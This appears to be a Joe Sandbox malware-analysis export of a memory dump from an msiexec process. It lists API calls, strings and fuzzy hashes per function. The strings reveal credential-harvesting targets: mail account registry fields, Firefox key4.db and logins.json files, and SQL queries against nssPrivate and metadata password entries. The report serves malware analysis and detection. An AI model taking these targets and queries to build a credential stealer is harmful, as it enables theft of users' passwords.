                                                                                              • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402869
                                                                                                • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                              • _mbscpy.MSVCRT(?,?,6CBC7B60,?,00000000), ref: 004028A3
                                                                                                • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,6CBC7B60,?,00000000), ref: 0040297B
                                                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                              • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                              • API String ID: 1497257669-167382505
                                                                                              • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                              • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                              • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                              • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                              APIs
                                                                                              • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                              • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                              • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                              • memset.MSVCRT ref: 0040FCFD
                                                                                              • memset.MSVCRT ref: 0040FD1D
                                                                                              • memset.MSVCRT ref: 0040FD3B
                                                                                              • memset.MSVCRT ref: 0040FD54
                                                                                              • memset.MSVCRT ref: 0040FD72
                                                                                              • memset.MSVCRT ref: 0040FD8B
                                                                                              • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                              • memset.MSVCRT ref: 0040FE45
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                              • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                              • sprintf.MSVCRT ref: 0040FF0F
                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                              • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                              Strings
                                                                                              • {Unknown}, xrefs: 0040FD02
                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                              • API String ID: 1428123949-3474136107
                                                                                              • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                              • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                              • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                              • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                              • memset.MSVCRT ref: 0040128E
                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2998058495-0
                                                                                              • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                              • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                              APIs
                                                                                                • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                              • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                              • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                              • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                              • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                              • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                              • _strcmpi.MSVCRT ref: 0040BE93
                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                              • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                              • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                              • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                              • strlen.MSVCRT ref: 0040BEFE
                                                                                              • strlen.MSVCRT ref: 0040BF0C
                                                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                              • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                              • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                              • memset.MSVCRT ref: 0040BFDB
                                                                                              • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                              • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                              • API String ID: 2303586283-933021314
                                                                                              • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                              • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                              • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                              • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                              APIs
                                                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                              • API String ID: 231171946-2189169393
                                                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                              • API String ID: 633282248-1996832678
                                                                                              • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                              • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00406782
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                              • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                              • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                              • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                              • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                              • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                              • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                              • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                              • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                              • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                              Strings
                                                                                              • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                              • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                              • key4.db, xrefs: 00406756
                                                                                              • , xrefs: 00406834
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp$memsetstrlen
                                                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                              • API String ID: 3614188050-3983245814
                                                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040A973
                                                                                              • memset.MSVCRT ref: 0040A996
                                                                                              • memset.MSVCRT ref: 0040A9AC
                                                                                              • memset.MSVCRT ref: 0040A9BC
                                                                                              • sprintf.MSVCRT ref: 0040A9F0
                                                                                              • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                              • sprintf.MSVCRT ref: 0040AABE
                                                                                              • _mbscat.MSVCRT ref: 0040AAED
                                                                                                • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                              • sprintf.MSVCRT ref: 0040AB21
                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              • API String ID: 710961058-601624466
                                                                                              • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                              • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                              • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                              • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: sprintf$memset$_mbscpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 3402215030-3842416460
                                                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                              APIs
                                                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                              • strlen.MSVCRT ref: 0040F139
                                                                                              • strlen.MSVCRT ref: 0040F147
                                                                                              • memset.MSVCRT ref: 0040F187
                                                                                              • strlen.MSVCRT ref: 0040F196
                                                                                              • strlen.MSVCRT ref: 0040F1A4
                                                                                              • memset.MSVCRT ref: 0040F1EA
                                                                                              • strlen.MSVCRT ref: 0040F1F9
                                                                                              • strlen.MSVCRT ref: 0040F207
                                                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                              • API String ID: 2003275452-3138536805
                                                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C3F7
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                              • strrchr.MSVCRT ref: 0040C417
                                                                                              • _mbscat.MSVCRT ref: 0040C431
                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                              • API String ID: 1012775001-1343505058
                                                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi
                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                              • API String ID: 1439213657-1959339147
                                                                                              • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                              • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                              • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                              • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00444612
                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                              • strlen.MSVCRT ref: 0044462E
                                                                                              • memset.MSVCRT ref: 00444668
                                                                                              • memset.MSVCRT ref: 0044467C
                                                                                              • memset.MSVCRT ref: 00444690
                                                                                              • memset.MSVCRT ref: 004446B6
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                                                              • String ID: salu
                                                                                              • API String ID: 3691931180-4177317985
                                                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
